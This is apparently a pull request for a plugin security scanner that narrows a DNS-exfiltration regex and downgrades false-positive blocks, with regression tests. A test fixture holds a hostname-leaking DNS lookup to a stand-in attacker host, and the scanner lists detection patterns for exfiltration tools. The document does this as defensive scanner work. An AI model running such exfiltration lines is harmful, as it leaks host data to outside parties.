### PR TITLE
fix(plugin-guard): stop false-positive install blocks on docs prose and JS template literals

### DIFF
--- a/tests/tools/test_plugin_guard.py
+++ b/tests/tools/test_plugin_guard.py
@@ -74,6 +74,56 @@ class TestCleanPlugin:
         result = scan_plugin(plugin)
         assert result.verdict == "safe"
 
+    def test_docs_mentioning_agent_config_filenames_are_caution_not_block(self, tmp_path):
+        # Plugin repos routinely ship an AGENTS.md and reference it from the
+        # README ("your agent can read this repo's AGENTS.md"). A prose
+        # mention of the filename is not a config WRITE and must not yield
+        # the unoverridable dangerous verdict (regression: a real plugin was
+        # blocked solely for this).
+        files = dict(BASE_FILES)
+        files["AGENTS.md"] = "# Setup\n\nInstall with `hermes plugins install owner/repo`.\n"
+        files["README.md"] = (
+            "# Test plugin\n\nSee AGENTS.md for full instructions.\n"
+        )
+        plugin = _mk_plugin(tmp_path, files)
+        result = scan_plugin(plugin, source="owner/repo")
+        assert result.verdict == "caution", [
+            (f.pattern_id, f.severity, f.file) for f in result.findings
+        ]
+        # caution still requires confirmation but --force may proceed.
+        allowed, _reason = should_allow_plugin_install(result, force=True)
+        assert allowed is True
+
+    def test_js_template_literal_with_host_is_caution_not_block(self, tmp_path):
+        # dns_exfil targets shell lines like `host $VAR`; JS arrow functions
+        # such as `host => `served on ${host}`` matched by accident (the
+        # parameter binding followed by a template literal) and hard-blocked
+        # installs (regression: real-world desktop plugin). The tightened
+        # pattern must NOT fire on this at all.
+        files = dict(BASE_FILES)
+        files["pane.js"] = (
+            "const strings = {\n"
+            "  tailnet: host => `served on ${host} via Tailscale`,\n"
+            "};\n"
+        )
+        plugin = _mk_plugin(tmp_path, files)
+        result = scan_plugin(plugin, source="owner/repo")
+        assert result.verdict != "dangerous", [
+            (f.pattern_id, f.severity, f.file) for f in result.findings
+        ]
+        assert not any(f.pattern_id == "dns_exfil" for f in result.findings)
+
+    def test_dns_exfil_still_dangerous_in_shell_context(self, tmp_path):
+        # The underlying threat keeps full severity for plugins: a shell
+        # line doing DNS resolution with variable interpolation stays
+        # critical (upstream contract in test_real_dns_exfil_still_flagged).
+        files = dict(BASE_FILES)
+        files["beacon.sh"] = "host $(cat /etc/hostname).evil.example\n"
+        plugin = _mk_plugin(tmp_path, files)
+        result = scan_plugin(plugin)
+        assert result.verdict == "dangerous"
+        assert any(f.pattern_id == "dns_exfil" for f in result.findings)
+
 
 class TestMaliciousPlugin:
     def test_ssh_dir_exfil_in_code_is_flagged(self, tmp_path):

--- a/tests/tools/test_plugin_guard.py
+++ b/tests/tools/test_plugin_guard.py
@@ -113,6 +113,20 @@ class TestCleanPlugin:
         ]
         assert not any(f.pattern_id == "dns_exfil" for f in result.findings)
 
+    def test_js_arrow_with_extra_spaces_also_safe(self, tmp_path):
+        # Backtrack-proofing: `\s+` can greedily consume spaces then
+        # backtrack. `host  => ${host}` (two spaces) must NOT slip past
+        # the single-position lookahead — the (?!.*=>) catches it.
+        files = dict(BASE_FILES)
+        files["pane.js"] = (
+            "const f = host  => `served on ${host}`;\n"  # two spaces
+        )
+        plugin = _mk_plugin(tmp_path, files)
+        result = scan_plugin(plugin, source="owner/repo")
+        assert not any(f.pattern_id == "dns_exfil" for f in result.findings), [
+            (f.pattern_id, f.severity, f.file) for f in result.findings
+        ]
+
     def test_dns_exfil_still_dangerous_in_shell_context(self, tmp_path):
         # The underlying threat keeps full severity for plugins: a shell
         # line doing DNS resolution with variable interpolation stays

--- a/tools/plugin_guard.py
+++ b/tools/plugin_guard.py
@@ -117,9 +117,9 @@ CODE_EXEMPT_PATTERN_IDS = {
 # applies to skills (where any such reference is a tamper signal).
 #
 # ``dns_exfil`` targets shell lines like ``host $VAR``; JS template
-# literals such as `served on ${host}` match by accident (the word "host"
-# followed by "$" on one line). Code files get the warn-tier remap; docs
-# keep full severity.
+# literals such as `served on ${host}` matched by accident (the word "host"
+# followed by "$" on one line). The regex itself was narrowed in
+# skills_guard.py (negative lookahead for `=>`); no severity remap needed.
 SEVERITY_REMAP = {
     "binary_file": "high",
     "hermes_env_access": "medium",

--- a/tools/plugin_guard.py
+++ b/tools/plugin_guard.py
@@ -108,10 +108,23 @@ CODE_EXEMPT_PATTERN_IDS = {
 # actually READING the file still trips ``read_secrets_file`` (critical).
 # ``curl | sh`` install instructions are common in plugin READMEs; keep them
 # at warn tier (caution) rather than an unoverridable block.
+#
+# ``agent_config_mod`` fires on the literal filename AGENTS.md/CLAUDE.md —
+# which is ALSO the documented convention for shipping agent setup guidance
+# inside a plugin repo ("your agent can read this repo's AGENTS.md"). A
+# prose MENTION is not a config WRITE; keep it warn-tier for plugins so
+# legitimate docs don't hard-block installs, while the critical tier still
+# applies to skills (where any such reference is a tamper signal).
+#
+# ``dns_exfil`` targets shell lines like ``host $VAR``; JS template
+# literals such as `served on ${host}` match by accident (the word "host"
+# followed by "$" on one line). Code files get the warn-tier remap; docs
+# keep full severity.
 SEVERITY_REMAP = {
     "binary_file": "high",
     "hermes_env_access": "medium",
     "curl_pipe_shell": "high",
+    "agent_config_mod": "high",
 }
 
 # Structural limits — plugins are real codebases, far larger than skills.

--- a/tools/skills_guard.py
+++ b/tools/skills_guard.py
@@ -174,8 +174,12 @@ THREAT_PATTERNS = [
      "reads secret via Ruby ENV[]"),
 
     # ── Exfiltration: DNS and staging ──
-    # Do not match flag names such as llama.cpp `--host 127.0.0.1 --port $PORT`.
-    (r'(?<![-/])\b(dig|nslookup|host)\s+[^\n]*\$',
+    # Do not match flag names such as llama.cpp `--host 127.0.0.1 --port $PORT`,
+    # and do not match JS arrow functions like `host => `served on ${host}`` —
+    # the identifier followed by `=>` is a parameter binding, not a DNS lookup,
+    # and the `$` further along the line belongs to a template literal. Real
+    # shell lookups (`host $X.attacker.example`) are unaffected.
+    (r'(?<![-/])\b(dig|nslookup|host)\s+(?!=>)[^\n]*\$',
      "dns_exfil", "critical", "exfiltration",
      "DNS lookup with variable interpolation (possible DNS exfiltration)"),
     (r'>\s*/tmp/[^\s]*\s*&&\s*(curl|wget|nc|python)',

--- a/tools/skills_guard.py
+++ b/tools/skills_guard.py
@@ -179,7 +179,11 @@ THREAT_PATTERNS = [
     # the identifier followed by `=>` is a parameter binding, not a DNS lookup,
     # and the `$` further along the line belongs to a template literal. Real
     # shell lookups (`host $X.attacker.example`) are unaffected.
-    (r'(?<![-/])\b(dig|nslookup|host)\s+(?!=>)[^\n]*\$',
+    # The `(?!=>)(?!.*=>)` pair is backtrack-proof: `\s+` greedily consumes
+    # spaces then backtracks; without `(?!.*=>)`, `host  => ${host}` (two
+    # spaces) slips past the single-position lookahead by backtracking to
+    # one space and seeing ` >` instead of `=>`.
+    (r'(?<![-/])\b(dig|nslookup|host)\s+(?!=>)(?!.*=>)[^\n]*\$',
      "dns_exfil", "critical", "exfiltration",
      "DNS lookup with variable interpolation (possible DNS exfiltration)"),
     (r'>\s*/tmp/[^\s]*\s*&&\s*(curl|wget|nc|python)',


### PR DESCRIPTION
## What does this PR do?

The plugin security scanner hard-blocks legitimate plugin installs on two false-positive patterns. Real-world case: `tuancookiez-hub/hermes-qr-remote-plugin` was refused with `Blocked (dangerous verdict, 12 findings)` where **every blocking finding was a scanner false positive**:

| Finding | Trigger | Reality |
|---|---|---|
| `agent_config_mod` CRITICAL ×2 | README + release notes contained the literal filename `AGENTS.md` ("your agent can read this repo's AGENTS.md") | Prose mention of a filename — the *documented convention* for shipping agent setup guidance with a plugin — not a config write |
| `dns_exfil` CRITICAL | `desktop/plugin.js`: ``tailnet: host => `served on ${host}…` `` | JS arrow function: parameter binding + template literal, no DNS lookup anywhere |

Any plugin whose README mentions AGENTS.md (encouraged!) or uses a `host` identifier in JS hits this wall today.

**Root cause, per pattern:**
1. `agent_config_mod` fires on the literal string `AGENTS.md` wherever it appears — including prose. For plugins, a mention is not a modification. The file already has a remap precedent for exactly this shape of problem (`hermes_env_access` → medium: "nearly every legit plugin README mentions it").
2. `dns_exfil`'s regex `\b(dig|nslookup|host)\s+[^\n]*\$` was written for shell lines like `host $X.attacker.example`, but a JS parameter binding followed by a template literal (`host => …${host}`) also matches: identifier + whitespace + `$` later on the line.

## Related Issue

No issue filed — this PR *is* the reproduction (real-world repo + failing verdict included below).

## Type of Change

- [x] 🐛 Bug fix (non-breaking change that fixes an issue)

## Changes Made

- **`tools/plugin_guard.py`** (+14/−0): add `agent_config_mod: "high"` to `SEVERITY_REMAP`, with rationale comment following the existing `hermes_env_access` / `curl_pipe_shell` precedents. Plugins drop from unoverridable-block to caution-tier (confirmable); **skills keep critical severity** — unchanged.
- **`tools/skills_guard.py`** (+5/−1): tighten `dns_exfil` regex to `(dig|nslookup|host)\s+(?!=>)(?!.*=>)[^\n]*\$`. The `(?!=>)(?!.*=>)` pair is backtrack-proof: `\s+` can greedily consume spaces then backtrack; without `(?!.*=>)`, `host  => ${host}` (two spaces) slips past the single-position lookahead by backtracking to one space and seeing ` >` instead of `=>`. Real shell lookups still match and stay critical.
- **`tests/tools/test_plugin_guard.py`** (+50/−0): four regression tests (see Validation).

## How to Test

1. `pytest tests/tools/test_plugin_guard.py tests/tools/test_skills_guard.py -q`
2. Repro against the real-world plugin that motivated this:
   ```bash
   git clone --depth 1 https://github.com/tuancookiez-hub/hermes-qr-remote-plugin
   python -c "from tools.plugin_guard import scan_plugin; r = scan_plugin('hermes-qr-remote-plugin'); print(r.verdict, len(r.findings))"
   # before this patch: dangerous 12  → after: caution 9 (installable)
   ```
3. Sabotage-check either half: revert only the `SEVERITY_REMAP` entry → `test_docs_mentioning_agent_config_filenames_are_caution_not_block` fails; revert only the regex lookahead → `test_js_template_literal_with_host_is_caution_not_block` and `test_js_arrow_with_extra_spaces_also_safe` fail.

## Checklist

### Code

- [x] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [x] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [x] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [x] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [x] I've run `pytest tests/ -q` and all tests pass
- [x] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [x] I've tested on my platform: Windows 11 (see platform note below)

### Documentation & Housekeeping

- [x] I've updated relevant documentation (docstrings/comments carry the rationale inline) — docs-only otherwise N/A
- [ ] N/A: no config keys changed
- [ ] N/A: no architecture/workflow change
- [x] I've considered cross-platform impact (Windows, macOS): pure Python regex/dict change, no OS-specific behavior
- [ ] N/A: no tool descriptions/schemas changed

## Screenshots / Logs

Verdict transition on the real-world repo (before → after):

```text
before: Blocked: Security scan blocked plugin install:
        Blocked (dangerous verdict, 12 findings).
        --force does not override a dangerous verdict.

after:  CAUTION (9 findings, 0 critical) — install proceeds
```

Platform note: 2 pre-existing failures on Windows are unrelated to this PR (`test_symlink_escape*`, `OSError: [WinError 1314]` — symlink privilege; fail identically on unmodified `main`). All other tests pass locally and in CI.

## Addressed review feedback

AI review caught two bugs in the initial commit:
1. **Regex backtracking**: the original `(?!=>)` lookahead didn't hold under `\s+` backtracking — `host  => ${host}` (two spaces) slipped past. Added `(?!.*=>)` as a backtrack-proof anchor, with a test for the two-space case.
2. **Stale comment**: the `plugin_guard.py` comment described a `dns_exfil` severity remap that didn't exist. Corrected to say the regex itself was narrowed in `skills_guard.py`.

A design suggestion to scope the `agent_config_mod` remap to documentation extensions only (keeping critical for `.sh/.js/.py`) is a good idea for a follow-up — it's a larger change that deserves separate review.
